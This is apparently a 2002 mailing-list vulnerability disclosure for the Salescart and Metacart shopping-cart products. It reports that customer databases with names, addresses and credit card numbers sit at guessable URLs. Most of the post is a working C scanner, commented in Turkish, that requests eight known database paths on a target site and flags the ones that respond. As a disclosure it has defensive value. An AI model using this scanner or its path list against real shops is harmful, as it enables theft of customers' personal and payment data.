Salescart vuln.

[Tacettin Karadeniz <tacettinkaradeniz () yahoo com>]

Summary: 
In a business website which is made by Salescart, all
customer records
related to that website are reachable. All database
can be hide to 
shop.mdb file, in fpdb directory. Any user can be
reach this database whithous permission.
 There are some special informations this database and
they are; name, surname, adress,
e-mail, phone number, credit card number, company name
...
 The credit card numbers in shop.mdb file is placed in
query part.

Problem:
Accessing any of the following URL will return the
database used by the product:
http://xxxshop.com/fpdb/shop.mdb



/* Salescart ve Metacart kullanILan bir alI$veri$
sitesindeki mu$teri 
kayItLarInI bulma */

/* tacettinkaradeniz () yahoo com    karadenizeregli@2002
  */

/* I LoVe CiLeK :>

/* Not: Bu programI ba$tan sona ben yazmadIm. Sadece
gerekli yerlerde 
degi$iklik yaparak istediGim duzene getirdim :> */

#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>



void main(int argc, char *argv[])
{

  char *bulunan;
  char tampon[1024];
  char mesaj[] = "200";
  int toplam=0;
  int sayac;
  int buldum=0;
  char shoptampon[20];
  char *tmp[10];
  char *hata[10];


  int sock;
  struct in_addr addr;
  struct sockaddr_in sin;
  struct hostent *he;
  unsigned long giris;
  unsigned long duzelt;


tmp[1]="GET /fpdb/shop.mdb HTTP/1.0\n\n";
tmp[2]="GET /shoponline/fpdb/shop.mdb HTTP/1.0\n\n";
tmp[3]="GET /database/metacart.mdb HTTP/1.0\n\n";
tmp[4]="GET /shopping/database/metacart.mdb
HTTP/1.0\n\n";
tmp[5]="GET /shop/database/metacart.mdb HTTP/1.0\n\n";
tmp[6]="GET /metacart/database/metacart.mdb
HTTP/1.0\n\n";
tmp[7]="GET /mcartfree/database/metacart.mdb
HTTP/1.0\n\n";
tmp[8]="GET /ASP/cart/database/metacart.mdb
HTTP/1.0\n\n";

hata[1] = "/fpdb/shop.mdb  ";
hata[2] = "/shoponline/fpdb/shop.mdb  ";
hata[3] = "/database/metacart.mdb  ";
hata[4] = "/shopping/database/metacart.mdb  ";
hata[5] = "/shop/database/metacart.mdb  ";
hata[6] = "/metacart/database/metacart.mdb  ";
hata[7] = "/mcartfree/database/metacart.mdb  ";
hata[8] = "/ASP/cart/database/metacart.mdb  ";



if (argc<2)
  {
system("clear");
printf("\n\t _                     ");
printf("\n\t|_  ._   _    _   |  o ");
printf("\n\t|_  |   (/_  (_|  |  | ");
printf("\n\t              _|       ");
printf("\n\nSalescart - Metacart  (c) 2002 ");
printf("\nKullanImI : %s www.xxxshopxyz.com
\n\n",argv[0]);

exit(0);
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname"); 
exit(0);
}
system("clear");
printf("\n\t _                     ");
printf("\n\t|_  ._   _    _   |  o ");
printf("\n\t|_  |   (/_  (_|  |  | ");
printf("\n\t              _|       ");
printf("\n\t  Salescart - Metacart  (c) 2002 ");

giris=inet_addr(argv[1]);

duzelt=ntohl(giris);

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}
send(sock, "HEAD / HTTP/1.0\n\n",17,0);

recv(sock, tampon, sizeof(tampon),0);
printf("%s",tampon);
close(sock);
system("clear");
printf("Tarama YapILIyor..\n\n");

while(toplam++ < 8)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}

for(sayac=0;sayac < 20;sayac++)
{
shoptampon[sayac] = '\0';
}

send(sock, tmp[toplam],strlen(tmp[toplam]),0);
recv(sock, shoptampon, sizeof(shoptampon),0);

bulunan = strstr(shoptampon,mesaj);

if( bulunan != NULL)
{
printf("%s : ",hata[toplam]);
printf(" Oleyyy.. Bulundu :\)\n");++buldum;
}
close(sock);
}

if (buldum)
{
printf("\n Tarama isLemi %s web sistesi icin
bitti.\n", argv[1]);
}
else printf ("\n Uzgunum tarama sonucu bir veri
bulunamamIstIr...\n\n");

}


__________________________________________________
Do You Yahoo!?
Yahoo! - Official partner of 2002 FIFA World Cup
http://fifaworldcup.yahoo.com